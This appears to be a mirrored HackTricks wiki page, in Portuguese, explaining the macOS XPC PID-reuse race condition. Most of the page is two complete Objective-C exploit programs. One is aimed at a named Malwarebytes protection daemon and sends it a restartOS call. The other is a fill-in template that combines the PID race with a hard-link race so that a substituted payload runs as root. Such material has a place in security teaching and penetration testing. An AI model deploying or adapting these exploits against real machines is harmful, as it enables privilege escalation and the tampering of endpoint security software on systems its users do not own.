mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-21 02:23:30 +00:00
303 lines
12 KiB
Markdown
303 lines
12 KiB
Markdown
|
# Reutilização de PID no macOS
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? Ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
||
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|
||
|
|
||
|
## Reutilização de PID
|
||
|
|
||
|
Quando um serviço **XPC** do macOS verifica o processo chamado com base no **PID** e não no **token de auditoria**, ele está vulnerável a um ataque de reutilização de PID. Esse ataque é baseado em uma **condição de corrida** em que um **exploit** vai **enviar mensagens para o serviço XPC** abusando da funcionalidade e, **logo após**, executar **`posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ)`** com o binário **permitido**.
|
||
|
|
||
|
Essa função fará com que o **binário permitido possua o PID**, mas a **mensagem XPC maliciosa terá sido enviada** logo antes. Portanto, se o serviço **XPC** usar o **PID** para **autenticar** o remetente e verificar isso **APÓS** a execução do **`posix_spawn`**, ele pensará que vem de um processo **autorizado**.
|
||
|
|
||
|
### Exemplo de exploit
|
||
|
|
||
|
Se você encontrar a função **`shouldAcceptNewConnection`** ou uma função chamada por ela que **chame** **`processIdentifier`** e não chame **`auditToken`**, é altamente provável que esteja verificando o PID do processo e não o token de auditoria.\
|
||
|
Como por exemplo nesta imagem (retirada da referência):
|
||
|
|
||
|
<figure><img src="../../../../.gitbook/assets/image (4) (1) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
Verifique este exemplo de exploit (novamente, retirado da referência) para ver as 2 partes do exploit:
|
||
|
|
||
|
* Uma que **gera vários forks**
|
||
|
* **Cada fork** irá **enviar** a **carga útil** para o serviço XPC enquanto executa **`posix_spawn`** logo após o envio da mensagem.
|
||
|
|
||
|
{% hint style="danger" %}
|
||
|
Para que o exploit funcione, é importante exportar **`OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES`** ou colocar no exploit:
|
||
|
```objectivec
|
||
|
asm(".section __DATA,__objc_fork_ok\n"
|
||
|
"empty:\n"
|
||
|
".no_dead_strip empty\n");
|
||
|
```
|
||
|
{% endhint %}
|
||
|
|
||
|
{% tabs %}
|
||
|
{% tab title="NSTasks" %}
|
||
|
Primeira opção usando **`NSTasks`** e argumento para lançar os processos filhos para explorar o RC
|
||
|
```objectivec
|
||
|
// from https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/
|
||
|
// gcc -framework Foundation expl.m -o expl
|
||
|
|
||
|
#import <Foundation/Foundation.h>
|
||
|
#include <spawn.h>
|
||
|
#include <sys/stat.h>
|
||
|
|
||
|
#define RACE_COUNT 32
|
||
|
#define MACH_SERVICE @"com.malwarebytes.mbam.rtprotection.daemon"
|
||
|
#define BINARY "/Library/Application Support/Malwarebytes/MBAM/Engine.bundle/Contents/PlugIns/RTProtectionDaemon.app/Contents/MacOS/RTProtectionDaemon"
|
||
|
|
||
|
// allow fork() between exec()
|
||
|
asm(".section __DATA,__objc_fork_ok\n"
|
||
|
"empty:\n"
|
||
|
".no_dead_strip empty\n");
|
||
|
|
||
|
extern char **environ;
|
||
|
|
||
|
// defining necessary protocols
|
||
|
@protocol ProtectionService
|
||
|
- (void)startDatabaseUpdate;
|
||
|
- (void)restoreApplicationLauncherWithCompletion:(void (^)(BOOL))arg1;
|
||
|
- (void)uninstallProduct;
|
||
|
- (void)installProductUpdate;
|
||
|
- (void)startProductUpdateWith:(NSUUID *)arg1 forceInstall:(BOOL)arg2;
|
||
|
- (void)buildPurchaseSiteURLWithCompletion:(void (^)(long long, NSString *))arg1;
|
||
|
- (void)triggerLicenseRelatedChecks;
|
||
|
- (void)buildRenewalLinkWith:(NSUUID *)arg1 completion:(void (^)(long long, NSString *))arg2;
|
||
|
- (void)cancelTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
|
||
|
- (void)startTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
|
||
|
- (void)unredeemLicenseKeyWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
|
||
|
- (void)applyLicenseWith:(NSUUID *)arg1 key:(NSString *)arg2 completion:(void (^)(long long))arg3;
|
||
|
- (void)controlProtectionWithRawFeatures:(long long)arg1 rawOperation:(long long)arg2;
|
||
|
- (void)restartOS;
|
||
|
- (void)resumeScanJob;
|
||
|
- (void)pauseScanJob;
|
||
|
- (void)stopScanJob;
|
||
|
- (void)startScanJob;
|
||
|
- (void)disposeOperationBy:(NSUUID *)arg1;
|
||
|
- (void)subscribeTo:(long long)arg1;
|
||
|
- (void)pingWithTag:(NSUUID *)arg1 completion:(void (^)(NSUUID *, long long))arg2;
|
||
|
@end
|
||
|
|
||
|
void child() {
|
||
|
|
||
|
// send the XPC messages
|
||
|
NSXPCInterface *remoteInterface = [NSXPCInterface interfaceWithProtocol:@protocol(ProtectionService)];
|
||
|
NSXPCConnection *xpcConnection = [[NSXPCConnection alloc] initWithMachServiceName:MACH_SERVICE options:NSXPCConnectionPrivileged];
|
||
|
xpcConnection.remoteObjectInterface = remoteInterface;
|
||
|
|
||
|
[xpcConnection resume];
|
||
|
[xpcConnection.remoteObjectProxy restartOS];
|
||
|
|
||
|
char target_binary[] = BINARY;
|
||
|
char *target_argv[] = {target_binary, NULL};
|
||
|
posix_spawnattr_t attr;
|
||
|
posix_spawnattr_init(&attr);
|
||
|
short flags;
|
||
|
posix_spawnattr_getflags(&attr, &flags);
|
||
|
flags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED);
|
||
|
posix_spawnattr_setflags(&attr, flags);
|
||
|
posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);
|
||
|
}
|
||
|
|
||
|
bool create_nstasks() {
|
||
|
|
||
|
NSString *exec = [[NSBundle mainBundle] executablePath];
|
||
|
NSTask *processes[RACE_COUNT];
|
||
|
|
||
|
for (int i = 0; i < RACE_COUNT; i++) {
|
||
|
processes[i] = [NSTask launchedTaskWithLaunchPath:exec arguments:@[ @"imanstask" ]];
|
||
|
}
|
||
|
|
||
|
int i = 0;
|
||
|
struct timespec ts = {
|
||
|
.tv_sec = 0,
|
||
|
.tv_nsec = 500 * 1000000,
|
||
|
};
|
||
|
|
||
|
nanosleep(&ts, NULL);
|
||
|
if (++i > 4) {
|
||
|
for (int i = 0; i < RACE_COUNT; i++) {
|
||
|
[processes[i] terminate];
|
||
|
}
|
||
|
return false;
|
||
|
}
|
||
|
|
||
|
return true;
|
||
|
}
|
||
|
|
||
|
int main(int argc, const char * argv[]) {
|
||
|
|
||
|
if(argc > 1) {
|
||
|
// called from the NSTasks
|
||
|
child();
|
||
|
|
||
|
} else {
|
||
|
NSLog(@"Starting the race");
|
||
|
create_nstasks();
|
||
|
}
|
||
|
|
||
|
return 0;
|
||
|
}
|
||
|
```
|
||
|
{% tab title="fork" %}
|
||
|
Este exemplo usa um **`fork`** bruto para lançar **filhos que irão explorar a condição de corrida do PID** e, em seguida, explorar **outra condição de corrida através de um Hard link:**
|
||
|
```objectivec
|
||
|
// export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES
|
||
|
// gcc -framework Foundation expl.m -o expl
|
||
|
|
||
|
#include <Foundation/Foundation.h>
|
||
|
#include <spawn.h>
|
||
|
#include <pthread.h>
|
||
|
|
||
|
// TODO: CHANGE PROTOCOL AND FUNCTIONS
|
||
|
@protocol HelperProtocol
|
||
|
- (void)DoSomething:(void (^)(_Bool))arg1;
|
||
|
@end
|
||
|
|
||
|
// Global flag to track exploitation status
|
||
|
bool pwned = false;
|
||
|
|
||
|
/**
|
||
|
* Continuously overwrite the contents of the 'hard_link' file in a race condition to make the
|
||
|
* XPC service verify the legit binary and then execute as root out payload.
|
||
|
*/
|
||
|
void *check_race(void *arg) {
|
||
|
while(!pwned) {
|
||
|
// Overwrite with contents of the legit binary
|
||
|
system("cat ./legit_bin > hard_link");
|
||
|
usleep(50000);
|
||
|
|
||
|
// Overwrite with contents of the payload to execute
|
||
|
// TODO: COMPILE YOUR OWN PAYLOAD BIN
|
||
|
system("cat ./payload > hard_link");
|
||
|
usleep(50000);
|
||
|
}
|
||
|
return NULL;
|
||
|
}
|
||
|
|
||
|
void child_xpc_pid_rc_abuse(){
|
||
|
// TODO: INDICATE A VALID BIN TO BYPASS SIGN VERIFICATION
|
||
|
#define kValid "./Legit Updater.app/Contents/MacOS/Legit"
|
||
|
extern char **environ;
|
||
|
|
||
|
// Connect with XPC service
|
||
|
// TODO: CHANGE THE ID OF THE XPC TO EXPLOIT
|
||
|
NSString* service_name = @"com.example.Helper";
|
||
|
NSXPCConnection* connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];
|
||
|
// TODO: CNAGE THE PROTOCOL NAME
|
||
|
NSXPCInterface* interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperProtocol)];
|
||
|
[connection setRemoteObjectInterface:interface];
|
||
|
[connection resume];
|
||
|
|
||
|
id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError* error) {
|
||
|
NSLog(@"[-] Something went wrong");
|
||
|
NSLog(@"[-] Error: %@", error);
|
||
|
}];
|
||
|
|
||
|
NSLog(@"obj: %@", obj);
|
||
|
NSLog(@"conn: %@", connection);
|
||
|
|
||
|
// Call vulenrable XPC function
|
||
|
// TODO: CHANEG NAME OF FUNCTION TO CALL
|
||
|
[obj DoSomething:^(_Bool b){
|
||
|
NSLog(@"Response, %hdd", b);
|
||
|
}];
|
||
|
|
||
|
// Change current process to the legit binary suspended
|
||
|
char target_binary[] = kValid;
|
||
|
char *target_argv[] = {target_binary, NULL};
|
||
|
posix_spawnattr_t attr;
|
||
|
posix_spawnattr_init(&attr);
|
||
|
short flags;
|
||
|
posix_spawnattr_getflags(&attr, &flags);
|
||
|
flags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED);
|
||
|
posix_spawnattr_setflags(&attr, flags);
|
||
|
posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);
|
||
|
}
|
||
|
|
||
|
/**
|
||
|
* Function to perform the PID race condition using children calling the XPC exploit.
|
||
|
*/
|
||
|
void xpc_pid_rc_abuse() {
|
||
|
#define RACE_COUNT 1
|
||
|
extern char **environ;
|
||
|
int pids[RACE_COUNT];
|
||
|
|
||
|
// Fork child processes to exploit
|
||
|
for (int i = 0; i < RACE_COUNT; i++) {
|
||
|
int pid = fork();
|
||
|
if (pid == 0) { // If a child process
|
||
|
child_xpc_pid_rc_abuse();
|
||
|
}
|
||
|
printf("forked %d\n", pid);
|
||
|
pids[i] = pid;
|
||
|
}
|
||
|
|
||
|
// Wait for children to finish their tasks
|
||
|
sleep(3);
|
||
|
|
||
|
// Terminate child processes
|
||
|
for (int i = 0; i < RACE_COUNT; i++) {
|
||
|
if (pids[i]) {
|
||
|
kill(pids[i], 9);
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
|
||
|
int main(int argc, const char * argv[]) {
|
||
|
// Create and set execution rights to 'hard_link' file
|
||
|
system("touch hard_link");
|
||
|
system("chmod +x hard_link");
|
||
|
|
||
|
// Create thread to exploit sign verification RC
|
||
|
pthread_t thread;
|
||
|
pthread_create(&thread, NULL, check_race, NULL);
|
||
|
|
||
|
while(!pwned) {
|
||
|
// Try creating 'download' directory, ignore errors
|
||
|
system("mkdir download 2>/dev/null");
|
||
|
|
||
|
// Create a hardlink
|
||
|
// TODO: CHANGE NAME OF FILE FOR SIGN VERIF RC
|
||
|
system("ln hard_link download/legit_bin");
|
||
|
|
||
|
xpc_pid_rc_abuse();
|
||
|
usleep(10000);
|
||
|
|
||
|
// The payload will generate this file if exploitation is successfull
|
||
|
if (access("/tmp/pwned", F_OK ) == 0) {
|
||
|
pwned = true;
|
||
|
}
|
||
|
}
|
||
|
|
||
|
return 0;
|
||
|
}
|
||
|
```
|
||
|
{% endtab %}
|
||
|
{% endtabs %}
|
||
|
|
||
|
## Referências
|
||
|
|
||
|
* [https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/](https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/)
|
||
|
* [https://saelo.github.io/presentations/warcon18\_dont\_trust\_the\_pid.pdf](https://saelo.github.io/presentations/warcon18\_dont\_trust\_the\_pid.pdf)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
||
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|